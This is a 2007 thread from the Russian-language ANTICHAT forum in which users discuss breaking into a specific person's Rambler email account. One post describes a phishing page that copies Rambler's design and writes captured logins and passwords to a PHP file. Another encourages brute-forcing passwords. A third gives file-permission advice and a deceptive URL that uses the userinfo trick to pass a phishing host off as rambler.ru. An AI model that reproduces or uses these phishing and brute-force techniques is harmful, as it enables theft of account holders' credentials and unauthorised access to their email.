ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail

Ответ

Опции темы Поиск в этой теме Опции просмотра

Старый 28.01.2007, 13:43
Srg
Участник форума
Провел на форуме:
402743

Отправить сообщение для Srg с помощью ICQ

Так это и есть фэйковая страница, которая полностью копирует дизайн рамблера а когда пользовтель воодит свой логин и пароль, то он сохраняется в ramblerbase.php, посмотри исходники и увидишь форму, которая все кидает в этот файл

Старый 28.01.2007, 13:43
Один
Познающий
Провел на форуме:
203784

Отправить сообщение для Один с помощью ICQ

Цитата:
Сообщение от jokertnt  
Есть ли вообще какой-нибудь хороший проверенный способ взлома мыла на rambler. Говорят там хорошая заЩИТа! Да брутус не поможет у некоторых пароли вот такие habahabh%^!#! в словаре такого нету(для брутуса)! помогите плиз!
З.Ы. Просьба не писать способы с трояном не педагогично!
Проверенных способов нет.Надо использовать все.А насчет защиты супер незнаю,парень знакомый брутил майло причем за один день.Как ,сие мне неизвестно.Защита(в плане того,что могут "забанить" при бруте)насколько мне известно только на mail.ru.И педагогично все.Кто не рискует,тот не пъет шампанского.С Уважением Один.

Старый 28.01.2007, 15:28
Srg
Участник форума
Провел на форуме:
402743

Отправить сообщение для Srg с помощью ICQ

Пробовал вручную подбирать (про чела немного знаю) - иногда выпадает картинка с кодом

Старый 28.01.2007, 15:43
~GroM~
Познающий
Провел на форуме:
148599

Отправить сообщение для ~GroM~ с помощью ICQ

незабудь для того фаила в который логи записываются поставить сhmod 777 а то у тебя писать ни чего не будетю
http://rambler.ru:asdsdfkasdhfskdjfksgdfuhglsdfjghlsdjfhg lskdjfhglskdjfgh@cheet.ueuo.com/www вот эту ссылку можешь дать. только в Ie она не пашет тот который выше 6 версии Или эту cheet.ueuo.com/www если у нее осел стоит
за паролями ко мне в асю 858759. Ей только необходимо набрать в поля логин и пароль.

Последний раз редактировалось ~GroM~; 28.01.2007 в 15:45..

Ответ